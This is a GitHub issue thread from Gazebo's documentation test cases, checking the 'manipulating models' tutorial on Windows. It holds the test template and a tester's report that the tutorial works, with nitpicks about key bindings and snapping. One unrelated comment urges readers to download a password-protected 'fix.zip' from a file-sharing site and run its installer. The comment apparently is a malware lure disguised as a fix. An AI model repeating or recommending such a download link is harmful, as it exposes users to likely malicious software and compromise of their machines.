gazebosim/gazebo_test_cases #1060: docs: manipulating_models

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/docs/ionic/manipulating_models)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/Manipulating_models.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-10:
You can assign me to this test case

knmcguire, 2024-09-10:
✅ Seems to work on Win 11 with source install and separate server and gui startup

[image]

Some nitpicks:
- The holding down of X,Y,Z while clicking and dragging won't work since that manipulates the scene
- When fixing the coordinate system to the world, releasing the model won't snap it back to body fixed axis like in the instructions. You'll need to select the model again for it to snap back
- The video that show-cases the component selector has some weird values of the pose in the tutorial

closed 2024-09-13 by azeey